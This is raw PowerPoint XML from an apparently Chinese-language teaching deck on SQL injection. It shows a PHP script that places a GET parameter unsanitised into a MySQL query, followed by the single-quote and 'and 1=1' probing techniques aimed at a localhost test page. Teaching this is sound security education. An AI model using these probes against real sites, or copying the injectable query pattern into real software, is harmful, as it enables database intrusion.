                    <a:pt x="107753" y="521832"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="49043" y="521832"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="401728" y="463192"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="427908" y="463192"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="427908" y="482739"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="401728" y="482739"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="49043" y="463192"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="75082" y="463192"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="75082" y="482739"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="49043" y="482739"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="215558" y="456619"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="215558" y="489235"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="261304" y="489235"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="261304" y="456619"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="274395" y="283744"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="293975" y="283744"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="293975" y="314320"/>
                    <a:pt x="269055" y="339208"/>
                    <a:pt x="238440" y="339208"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="238440" y="319653"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="258287" y="319653"/>
                    <a:pt x="274395" y="303565"/>
                    <a:pt x="274395" y="283744"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="238440" y="228350"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="238440" y="247880"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="218682" y="247880"/>
                    <a:pt x="202574" y="263948"/>
                    <a:pt x="202574" y="283744"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="182905" y="283744"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="182905" y="253206"/>
                    <a:pt x="207824" y="228350"/>
                    <a:pt x="238440" y="228350"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="238431" y="202267"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="193402" y="202267"/>
                    <a:pt x="156828" y="238801"/>
                    <a:pt x="156828" y="283778"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="156828" y="328756"/>
                    <a:pt x="193402" y="365378"/>
                    <a:pt x="238431" y="365378"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="283460" y="365378"/>
                    <a:pt x="320124" y="328756"/>
                    <a:pt x="320124" y="283778"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="320124" y="238801"/>
                    <a:pt x="283460" y="202267"/>
                    <a:pt x="238431" y="202267"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="238431" y="182623"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="294317" y="182623"/>
                    <a:pt x="339702" y="228045"/>
                    <a:pt x="339702" y="283778"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="339702" y="339512"/>
                    <a:pt x="294317" y="384934"/>
                    <a:pt x="238431" y="384934"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="182635" y="384934"/>
                    <a:pt x="137250" y="339512"/>
                    <a:pt x="137250" y="283778"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="137250" y="228045"/>
                    <a:pt x="182635" y="182623"/>
                    <a:pt x="238431" y="182623"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="238431" y="150014"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="164650" y="150014"/>
                    <a:pt x="104575" y="210002"/>
                    <a:pt x="104575" y="283765"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="104575" y="314514"/>
                    <a:pt x="114721" y="343486"/>
                    <a:pt x="134034" y="367392"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="152813" y="390677"/>
                    <a:pt x="179068" y="407118"/>
                    <a:pt x="207993" y="413872"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="215558" y="415649"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="215558" y="437067"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="261304" y="437067"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="261304" y="415649"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="268869" y="413872"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="297883" y="407118"/>
                    <a:pt x="324138" y="390677"/>
                    <a:pt x="342917" y="367392"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="362141" y="343486"/>
                    <a:pt x="372376" y="314514"/>
                    <a:pt x="372376" y="283765"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="372376" y="210002"/>
                    <a:pt x="312301" y="150014"/>
                    <a:pt x="238431" y="150014"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="49043" y="84820"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="153550" y="84820"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="153550" y="104367"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="49043" y="104367"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="146988" y="45656"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="179660" y="45656"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="179660" y="65203"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="146988" y="65203"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="49043" y="45656"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="127371" y="45656"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="127371" y="65203"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="49043" y="65203"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="385459" y="33415"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="385459" y="91359"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="443487" y="91359"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="19580" y="19551"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="19580" y="587082"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="195978" y="587082"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="195978" y="430935"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="165807" y="422315"/>
                    <a:pt x="138573" y="404274"/>
                    <a:pt x="118726" y="379657"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="96921" y="352640"/>
                    <a:pt x="84906" y="318602"/>
                    <a:pt x="84906" y="283765"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="84906" y="199249"/>
                    <a:pt x="153792" y="130462"/>
                    <a:pt x="238431" y="130462"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="323159" y="130462"/>
                    <a:pt x="391956" y="199249"/>
                    <a:pt x="391956" y="283765"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="391956" y="318602"/>
                    <a:pt x="379941" y="352640"/>
                    <a:pt x="358136" y="379657"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="338289" y="404274"/>
                    <a:pt x="311144" y="422315"/>
                    <a:pt x="280884" y="430935"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="280884" y="587082"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="457282" y="587082"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="457282" y="110911"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="365879" y="110911"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="365879" y="19551"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="379674" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="476951" y="97047"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="476951" y="606722"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="606722"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="íṡľíḍè-Rectangle 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1028700" y="3264358"/>
            <a:ext cx="10860114" cy="128807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通常我们关注</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ASP,JSP,CGI</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的网页，尤其是</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中携带参数的，例如</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http://xxx/xxx.asp?id=numorstring</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。其中，参数可以是整数类型的也可以是字符串类型的。</a:t>
            </a:r>
            <a:endPar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íṡľíḍè-Rectangle 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1028699" y="2680221"/>
            <a:ext cx="3528467"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GET</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型的请求最容易被注入</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矩形: 圆角 27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1041374" y="5047824"/>
            <a:ext cx="10860114" cy="1088781"/>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我们以数字类型为例，进行以下的讲解。</a:t>
            </a:r>
            <a:endPar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如果下面两个方法能成功，说明存在</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注入漏洞，也就是他们对输入信息并没有做有效的筛查和处理。</a:t>
            </a:r>
            <a:endPar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8" decel="6000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0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="17" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="27"/>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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="21" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="26"/>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5105936" y="837929"/>
            <a:ext cx="2646879" cy="474140"/>
            <a:chOff x="5105936" y="837929"/>
            <a:chExt cx="2646879" cy="474140"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="26"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105936" y="837929"/>
              <a:ext cx="2646879"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一段有问题的代码</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aphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="30" name="表格 29"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1964879" y="1456085"/>
          <a:ext cx="9001000" cy="5215414"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="9001000"/>
              </a:tblGrid>
              <a:tr h="4809167">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>&lt;?</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>php</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$con=</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>mysql_connect</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localhost</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>","root","</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>lenovo</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if(!$con){die(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>mysql_error</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err="1">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>mysql_select_db</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products",$con</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sql</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>="select * from category where id=$_GET[id]";</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echo $</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>sql</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>."&lt;</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>br</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>&gt;";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$result=</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>mysql_query</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sql</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>,$con);</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while($row=</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>mysql_fetch_array</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result,MYSQL_NUM</a:t>
                      </a:r>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echo $row[0]." ".$row[1]." ".$row[2] ."&lt;</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>br</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>&gt;";</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a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="lt1"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>mysql_free_result</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>($result);</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="lt1"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>mysql_close</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>($con);</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?&gt;</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="lt1"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="94775" marR="94775" marT="47387" marB="47387">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randombar(horizontal)">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5202512" y="837929"/>
            <a:ext cx="2453727" cy="474140"/>
            <a:chOff x="5202512" y="837929"/>
            <a:chExt cx="2453727"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413713" y="837929"/>
              <a:ext cx="203132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“单引号”法</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460823" y="1456085"/>
            <a:ext cx="10153128" cy="961289"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>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URL</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参数后添加一个单引号，若存在注入点则通常会返回一个错误，例如，下列错误通常表明存在</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MySQL</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注入漏洞： </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539539" y="2561389"/>
            <a:ext cx="9901100" cy="940066"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1092F1"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"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You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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矩形 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1747659" y="3950756"/>
            <a:ext cx="9363432" cy="499432"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:defRP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如果攻击者使用单引号注入</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http://localhost/test.php?id=1’</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，那么最终的语句将变为：</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矩形: 圆角 26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1460823" y="3904357"/>
            <a:ext cx="10009112" cy="230425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3889289" y="4448142"/>
            <a:ext cx="4865819" cy="498663"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:defRP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select * from category where id=1‘</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1784859" y="5012145"/>
            <a:ext cx="8964996" cy="961289"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:defRP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这将导致</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语句执行失败且</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mysql_query</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函数不会返回任何值，后面如果有</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mysql_fetch_array</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将返回给用户一条警告信息。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27" grpId="0" animBg="1"/>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5202512" y="837929"/>
            <a:ext cx="2453727" cy="474140"/>
            <a:chOff x="5202512" y="837929"/>
            <a:chExt cx="2453727"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259825" y="837929"/>
              <a:ext cx="233910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“永真永假”法</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460823" y="1456085"/>
            <a:ext cx="10153128" cy="1422954"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>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“单引号”法很直接，也很简单，但是对</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注入有一定了解的程序员在编写程序时，都会将单引号过滤掉。如果再使用单引号测试，就无法检测到注入点了。这时，就可以使用经典的“永真永假”法。</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1" name="组合 10"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1604839" y="3011495"/>
            <a:ext cx="9649072" cy="1625271"/>
            <a:chOff x="4197127" y="2392190"/>
            <a:chExt cx="9649072" cy="1625271"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="矩形 11"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4197127" y="2392190"/>
              <a:ext cx="9136338" cy="140924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413151" y="2608215"/>
              <a:ext cx="9433048" cy="1409246"/>
            </a:xfrm>
            <a:prstGeom prst="rect">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976963" y="3316729"/>
            <a:ext cx="6647974"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当与上一个永真式使逻辑不受影响时，页面应当与原页面相同。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="矩形 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1976963" y="3882422"/>
            <a:ext cx="8921951" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>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http://localhost/test.php?id=1 and 1=1</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，传递给后台数据库服务器的</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语句则变为：</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select * from category where id=1 and 1=1</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，并不影响原逻辑；</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0" name="直接连接符 9"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2046269" y="3760341"/>
            <a:ext cx="8708629" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="0050A3"/>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604839" y="4963929"/>
            <a:ext cx="9649072" cy="1625271"/>
            <a:chOff x="4197127" y="2392190"/>
            <a:chExt cx="9649072" cy="1625271"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="20" name="矩形 19"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4197127" y="2392190"/>
              <a:ext cx="9136338" cy="140924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413151" y="2608215"/>
